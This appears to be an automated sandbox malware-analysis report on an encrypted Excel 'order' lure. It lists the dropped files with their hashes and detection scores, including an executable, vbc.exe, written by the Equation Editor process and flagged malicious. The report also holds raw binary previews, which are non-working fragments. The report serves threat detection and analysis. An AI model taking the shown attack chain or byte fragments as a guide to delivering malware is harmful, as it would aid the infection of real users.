                                                                                                      Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A0B656B.png
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:PNG image data, 992 x 192, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):10715
                                                                                                      Entropy (8bit):7.414910193109876
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:o98wfjpHmBG5X18nbtppfc3yX1cbzIvwjBYlE7KmnmF2888888u:SNGBgX+hpp0ClcHIvqYWnmFL
                                                                                                      MD5:FE450E7017E0F21A25701C4ABC68021B
                                                                                                      SHA1:06090A749D7077371AFBB5DC698C60FE861B676E
                                                                                                      SHA-256:B3A9530ADB5B09DCC14E71AD9AF5421BB2F0D95CEB93E41A2C053B77E48C7FCB
                                                                                                      SHA-512:815A8784FCA30B9F882CB460DB9B47919B13D8C32673BEA14CDB63E70424917B02E6F220E55E3710C7E97EAE15EBA7968936A585D235947AA7124E5042BEA577
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview: .PNG........IHDR..............c......sBIT....|.d.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>..);IDATx^....,G.7...@..$.....=........wwwwww....I.._....3wV.....S..w..........w[[R#. @....... @....[&........O?.R..e........ @........+.......A....... @......-...?.....O....... @..........f@....... @......- ._..... @....... @.@.....MS @....... @......../ZX.... @....... @ .F....... @....... ...S....... @...........|.-@... @....... @`)...0+....... @....... ..{.P..... @.......X..E.w...l... @....... @.....\.J...G.... @....... @.......LA_8.... @....... @`........co..O....... @..........-._<.... @....... @`...;.......?..... @......,^.....|..J @....... @..............?..... @......,^..O}..|..J @....... @......`......... @....... @.......i...gV...... @.......]...<..|.@... @....... @`..G."V._.... @....... @....^../............ @......!..o.L...he. @....... @...S...... @....... ........A....... @.............. @........b...ydS.j........ @......
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F4CB40C.png
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):51166
                                                                                                      Entropy (8bit):7.767050944061069
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                                                      MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                                                      SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                                                      SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                                                      SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\611091FA.jpeg
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 88x89, frames 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3455
                                                                                                      Entropy (8bit):7.774304410172069
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:aUE73PJLlC/btznr7ELFGcVMS5MFeEnuOOshNzSZn40YTo3:aUMBLlCDtn7CVVMS5JEnuUzSt4TT0
                                                                                                      MD5:B6EE1614D1302AD75B751F7134E57AA8
                                                                                                      SHA1:CD0071E2B61C622CFA38FACE83826A42CD6F7116
                                                                                                      SHA-256:6D90BF5FE7C4F0C03F0FAFA9EBCBDEAE938F8AA77829F448645AA51EEAE9D986
                                                                                                      SHA-512:849EBCD27DE319A9320E3A614FF57BF3E6292ACD68020E977435D84C17A7FBBFB460E7E07EA576EE6531359DC2A200BCC2CB828C7690841E433B3B6CA872CE6E
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................Y.X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..........o.K,.(....]....h&c..<.....vvg..Zg.w...O.O.&...........|.....YKqwk..341.... 8vR.0.9..V..I.XOmq%....(....E.#.C4..!.R..F..Z.Y.p...S.wj.....2.~....n?..?.o.J....v....E.........v..~..}..s.6....{...q.\>..+..J..N.Pq.....S..-!.ew../.d .lr...:g.3BH.......).........?.Y...0...G.3....-V..L7..%W.QG*.........g....;|L....g......U.....?.Y...0...^.E..>.K.......C.....3..U
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\65BB8ECE.emf
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3659592
                                                                                                      Entropy (8bit):1.0022313728649812
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:YFPAuIU4U9tVvfJHGCOd+FPAuIU4U9tVvfJHGCOd2:YmIvhGJd+mIvhGJd2
                                                                                                      MD5:737130889222DA6A24DB863283F9AA2B
                                                                                                      SHA1:91A31F3169BCDC0CBFC1F47E75AABDA68C764DA0
                                                                                                      SHA-256:7B23C702859098656105259373C4A99936AEFF58064521496320532F23BE4772
                                                                                                      SHA-512:C2B7A34156164DD7E18E9CE206BCAF8324A9B545E035A14145CE98EF7D94664816676DF0E62DE31E0A6604EEAF7B036C3DCD59223ABF3DCB35EFC42EEF108FD9
                                                                                                      Malicious:false
                                                                                                      Preview: ....l...............\...............dS.. EMF....H.7.....................V...........................fZ..U"..F...4...(...GDIC........l..u....................i...........................................i...A. ...]...............(.......].............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AF88CAF.png
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):51166
                                                                                                      Entropy (8bit):7.767050944061069
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                                                      MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                                                      SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                                                      SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                                                      SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                                                      Malicious:false
                                                                                                      Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D2F9C18.png
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:PNG image data, 992 x 192, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):10715
                                                                                                      Entropy (8bit):7.414910193109876
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:o98wfjpHmBG5X18nbtppfc3yX1cbzIvwjBYlE7KmnmF2888888u:SNGBgX+hpp0ClcHIvqYWnmFL
                                                                                                      MD5:FE450E7017E0F21A25701C4ABC68021B
                                                                                                      SHA1:06090A749D7077371AFBB5DC698C60FE861B676E
                                                                                                      SHA-256:B3A9530ADB5B09DCC14E71AD9AF5421BB2F0D95CEB93E41A2C053B77E48C7FCB
                                                                                                      SHA-512:815A8784FCA30B9F882CB460DB9B47919B13D8C32673BEA14CDB63E70424917B02E6F220E55E3710C7E97EAE15EBA7968936A585D235947AA7124E5042BEA577
                                                                                                      Malicious:false
                                                                                                      Preview: .PNG........IHDR..............c......sBIT....|.d.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>..);IDATx^....,G.7...@..$.....=........wwwwww....I.._....3wV.....S..w..........w[[R#. @....... @....[&........O?.R..e........ @........+.......A....... @......-...?.....O....... @..........f@....... @......- ._..... @....... @.@.....MS @....... @......../ZX.... @....... @ .F....... @....... ...S....... @...........|.-@... @....... @`)...0+....... @....... ..{.P..... @.......X..E.w...l... @....... @.....\.J...G.... @....... @.......LA_8.... @....... @`........co..O....... @..........-._<.... @....... @`...;.......?..... @......,^.....|..J @....... @..............?..... @......,^..O}..|..J @....... @......`......... @....... @.......i...gV...... @.......]...<..|.@... @....... @`..G."V._.... @....... @....^../............ @......!..o.L...he. @....... @...S...... @....... ........A....... @.............. @........b...ydS.j........ @......
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70052995.jpeg
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 88x89, frames 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3455
                                                                                                      Entropy (8bit):7.774304410172069
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:aUE73PJLlC/btznr7ELFGcVMS5MFeEnuOOshNzSZn40YTo3:aUMBLlCDtn7CVVMS5JEnuUzSt4TT0
                                                                                                      MD5:B6EE1614D1302AD75B751F7134E57AA8
                                                                                                      SHA1:CD0071E2B61C622CFA38FACE83826A42CD6F7116
                                                                                                      SHA-256:6D90BF5FE7C4F0C03F0FAFA9EBCBDEAE938F8AA77829F448645AA51EEAE9D986
                                                                                                      SHA-512:849EBCD27DE319A9320E3A614FF57BF3E6292ACD68020E977435D84C17A7FBBFB460E7E07EA576EE6531359DC2A200BCC2CB828C7690841E433B3B6CA872CE6E
                                                                                                      Malicious:false
                                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................Y.X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..........o.K,.(....]....h&c..<.....vvg..Zg.w...O.O.&...........|.....YKqwk..341.... 8vR.0.9..V..I.XOmq%....(....E.#.C4..!.R..F..Z.Y.p...S.wj.....2.~....n?..?.o.J....v....E.........v..~..}..s.6....{...q.\>..+..J..N.Pq.....S..-!.ew../.d .lr...:g.3BH.......).........?.Y...0...G.3....-V..L7..%W.QG*.........g....;|L....g......U.....?.Y...0...^.E..>.K.......C.....3..U
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7DE011E6.png
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):79394
                                                                                                      Entropy (8bit):7.864111100215953
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                      MD5:16925690E9B366EA60B610F517789AF1
                                                                                                      SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                      SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                      SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                      Malicious:false
                                                                                                      Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1F47D39.jpeg
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8815
                                                                                                      Entropy (8bit):7.944898651451431
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                                      MD5:F06432656347B7042C803FE58F4043E1
                                                                                                      SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                                      SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                                      SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                                      Malicious:false
                                                                                                      Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C96B05B3.jpeg
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 178x124, frames 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7934
                                                                                                      Entropy (8bit):7.877426792469052
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:aPlVOjcI3QmjR79Z/7qjw0qwzhjBPlB4yinZe87:aPlIhJpqjwpwVjZSga
                                                                                                      MD5:BBACB9E08630847C0E6E84B5100C40C3
                                                                                                      SHA1:FDE4F15306F56139583ECB5E0EC99884A3F32371
                                                                                                      SHA-256:79505C5789C409D74A5F6C7D81C01DADBA9C7E80C7F7A6985CE5367C6FED2D2E
                                                                                                      SHA-512:E7C0A5E9FD51C4A813B7F70A6B5AD8F47AED7B7D1033A9F114B4D988CCD256CD376FC822EB6F9C4F9B3E095128AD905397C1F8D5AEE550615F2DD80E5AEA6F72
                                                                                                      Malicious:false
                                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................|...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}...g...M.W...t....4K)..P*...I.Q......../.....B_..........U..z.g....d...p.-Z..^.o........_./Z..n.dk%......0..QX*.%.c..yv8p.hN.d..t'._.":.B_.......O.f....."R...............f..&.Zu[..-........c]....Z..~frx.[....a.j..H..Zl8y....x..h.)B...)"...*. ...t}[...}.p......._.H...w...iG..D.....9......{..}*.J...y....o..!..`.@....)8...s./...'.SL..B..}j...X.#Y..a.93\#...^&.
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE617A92.jpeg
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 178x124, frames 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7934
                                                                                                      Entropy (8bit):7.877426792469052
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:aPlVOjcI3QmjR79Z/7qjw0qwzhjBPlB4yinZe87:aPlIhJpqjwpwVjZSga
                                                                                                      MD5:BBACB9E08630847C0E6E84B5100C40C3
                                                                                                      SHA1:FDE4F15306F56139583ECB5E0EC99884A3F32371
                                                                                                      SHA-256:79505C5789C409D74A5F6C7D81C01DADBA9C7E80C7F7A6985CE5367C6FED2D2E
                                                                                                      SHA-512:E7C0A5E9FD51C4A813B7F70A6B5AD8F47AED7B7D1033A9F114B4D988CCD256CD376FC822EB6F9C4F9B3E095128AD905397C1F8D5AEE550615F2DD80E5AEA6F72
                                                                                                      Malicious:false
                                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................|...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}...g...M.W...t....4K)..P*...I.Q......../.....B_..........U..z.g....d...p.-Z..^.o........_./Z..n.dk%......0..QX*.%.c..yv8p.hN.d..t'._.":.B_.......O.f....."R...............f..&.Zu[..-........c]....Z..~frx.[....a.j..H..Zl8y....x..h.)B...)"...*. ...t}[...}.p......._.H...w...iG..D.....9......{..}*.J...y....o..!..`.@....)8...s./...'.SL..B..}j...X.#Y..a.93\#...^&.
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D78A5477.png
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):79394
                                                                                                      Entropy (8bit):7.864111100215953
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                      MD5:16925690E9B366EA60B610F517789AF1
                                                                                                      SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                      SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                      SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                      Malicious:false
                                                                                                      Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                      C:\Users\user\Desktop\~$New Order for April#89032.xlsx
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):330
                                                                                                      Entropy (8bit):1.4377382811115937
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                      Malicious:true
                                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                      C:\Users\Public\vbc.exe
                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):881152
                                                                                                      Entropy (8bit):7.199964525474944
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:cSIIK2eESbfOEauXDylVOhrecPoFe/OIDIUSyBlt+vEHTwzZIKU6ke:cNIVUXXulVSBPo8OIDlJbzyI/
                                                                                                      MD5:5F968F612F82F74C96DD257793CF917D
                                                                                                      SHA1:004213F3E85514317B8A711EDC42A124BE378ADF
                                                                                                      SHA-256:2A0C31DCC49402D53D3907CBD0C79473E20B64AA098ADF71437946E58BD55299
                                                                                                      SHA-512:BAF41C5BC33A3349DFCF1B7A8978F002AB27A243A786BC80362132F757688AA366EE3A48A4CE071B39D9E9FDFAB04E5F204489D6BC23FEA7400CB5C9AABC2051
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.n`..............P..*...F......fI... ...`....@.. ....................................@..................................I..O....`..,B........................................................................... ............... ..H............text...l)... ...*.................. ..`.rsrc...,B...`...D...,..............@..@.reloc...............p..............@..B................HI......H........?...H..........L................................................0............(....( .........(.....o!....*.....................("......(#......($......(%......(&....*N..(....ol...('....*&..((....*.s)........s*........s+........s,........s-........*....0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0..<........~.....(3.....,!r...p.....(4...o5...s6............~.....+..*.0......

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:CDFV2 Encrypted
                                                                                                      Entropy (8bit):7.996699260832285
                                                                                                      TrID:
                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                      File name:New Order for April#89032.xlsx
                                                                                                      File size:2269696
                                                                                                      MD5:d7928e685d37d907d102cecdf3d3ce8b
                                                                                                      SHA1:3404ab865cdfb6c4a71151f5ae7bd17b92206885
                                                                                                      SHA256:a2bfcc72f1a7a817323c32d758b45716541e4c3a7e33a7d3939638a6a2e8eaaa
                                                                                                      SHA512:280a8eb7c681c72f52f333d5b47fb983c6e5a971682f27e5ec74d7cce23910c8f7a8020e3dcb85e9a4390c5859d206fcaabd6f3d023d523094ea52998cac345a
                                                                                                      SSDEEP:49152:D9jq8xY13JlsDo7RssRoodbu140WsTTmSgCu1E5:xFG3jRFnbS6smrCu1E
                                                                                                      File Content Preview:........................>...................#....................................................................................................................................... ...!..."...#...$...%......................................................

                                                                                                      File Icon

                                                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                      Static OLE Info

                                                                                                      General

                                                                                                      Document Type:OLE
                                                                                                      Number of OLE Files:1

                                                                                                      OLE File "New Order for April#89032.xlsx"

                                                                                                      Indicators

                                                                                                      Has Summary Info:False
                                                                                                      Application Name:unknown
                                                                                                      Encrypted Document:True
                                                                                                      Contains Word Document Stream:False
                                                                                                      Contains Workbook/Book Stream:False
                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                      Contains Visio Document Stream:False
                                                                                                      Contains ObjectPool Stream:
                                                                                                      Flash Objects Count:
                                                                                                      Contains VBA Macros:False

                                                                                                      Streams

                                                                                                      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                      General
                                                                                                      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                      File Type:data
                                                                                                      Stream Size:64
                                                                                                      Entropy:2.73637206947
